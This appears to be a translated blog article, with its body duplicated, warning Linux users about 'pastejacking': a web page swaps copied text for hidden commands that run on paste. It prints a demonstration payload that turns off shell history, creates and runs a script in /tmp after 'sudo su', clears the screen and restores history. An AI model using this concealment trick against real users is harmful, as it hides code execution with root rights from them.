
Attack on Linux users or how to assemble a botnet with the hands of administrators
For the purity of the experiment, I propose to follow the link and perform the “installation of useful packages” according to the specified instruction. Instructions for owners of Ubuntu.
The link is just a "demonstration" of this type of attack, but in any case, these actions are best done on the virtualtraining ground .
Below is a description of what happened in case you were not too lazy to perform the above actions.
A small preface: it often happens that when working with server configuration manuals it is too lazy to enter all the commands manually, especially long ones. Also, most console applications ignore line feed insertion and simply execute code instantly.
What if, when copying code on a page, we replace it in such a way that it would be inserted into the console, the necessary commands are automatically executed and the nuance is only how to hide a bad code from the user's eyes.
As a result, the following thought came:
1. We ask the user to increase privileges to root, which would be quite logical, given the further installation of packages.
2. We write a long command, thereby forcing the user to copy (namely copy and not enter the code by hand).
3. When copying - the clipboard is replaced by a bunch of commands necessary for conducting an attack. Namely:
Analysis of the first line:
1. Turn off the history of the entered commands
2. Actually the creation and execution of malicious code
3. Cleaning the console screen (you can clear)
4. Turn back the story
The second line is a record in the history of the previously entered command.
And actually the payload code.
As a result (depending on the console used), when you paste the copied code directly into the console, unwanted commands will be executed that will not appear in the history and on the screen.
If everything went as it should - at the address /tmp/test.sh there will be a “malware” that successfully executed when the code was inserted into the console.
In general, use terminals that warn you about inserting code with line feeds and do not mindlessly insert code from unverified sources. For Windows there is ConEmu, which warns of the insertion of similar code.
PS The above example is just my guess about a possible problem. In practice, this is not encountered.
The article is written only to warn users about such a completely possible attack vector.
UPD Thanks to ValdikSS for the tip of thejh.net/misc/website-terminal-copy-paste . Updated example.
I would also like to hear the opinion of users on how real the threat is in practice. And did you notice code execution after pasting the copied command into the console.
The link is just a "demonstration" of this type of attack, but in any case, these actions are best done on the virtual
Below is a description of what happened in case you were not too lazy to perform the above actions.
A small preface: it often happens that when working with server configuration manuals it is too lazy to enter all the commands manually, especially long ones. Also, most console applications ignore line feed insertion and simply execute code instantly.
What if, when copying code on a page, we replace it in such a way that it would be inserted into the console, the necessary commands are automatically executed and the nuance is only how to hide a bad code from the user's eyes.
As a result, the following thought came:
1. We ask the user to increase privileges to root, which would be quite logical, given the further installation of packages.
2. We write a long command, thereby forcing the user to copy (namely copy and not enter the code by hand).
3. When copying - the clipboard is replaced by a bunch of commands necessary for conducting an attack. Namely:
set +o history && echo 'echo you hacked!' > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh && printf "\033c" && set -o history
sudo su
apt-get update && apt-get install mc && apt-get install vim && apt-get install htop && apt-get install man
Analysis of the first line:
1. Turn off the history of the entered commands
set +o history
2. Actually the creation and execution of malicious code
echo 'echo you hacked!' > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh
3. Cleaning the console screen (you can clear)
printf "\033c"
4. Turn back the story
set -o history
The second line is a record in the history of the previously entered command.
And actually the payload code.
As a result (depending on the console used), when you paste the copied code directly into the console, unwanted commands will be executed that will not appear in the history and on the screen.
If everything went as it should - at the address /tmp/test.sh there will be a “malware” that successfully executed when the code was inserted into the console.
In general, use terminals that warn you about inserting code with line feeds and do not mindlessly insert code from unverified sources. For Windows there is ConEmu, which warns of the insertion of similar code.
PS The above example is just my guess about a possible problem. In practice, this is not encountered.
The article is written only to warn users about such a completely possible attack vector.
UPD Thanks to ValdikSS for the tip of thejh.net/misc/website-terminal-copy-paste . Updated example.
I would also like to hear the opinion of users on how real the threat is in practice. And did you notice code execution after pasting the copied command into the console.
Only registered users can participate in the survey. Please come in.
Have you noticed the execution of "malicious" code after inserting the command into the console?
- 18.6% Yes 119
- 10.5% No 67
- 6.1% The code did not work (if so, I would like to hear in the comments for what reason) 39
- 64.7% Not Tested 413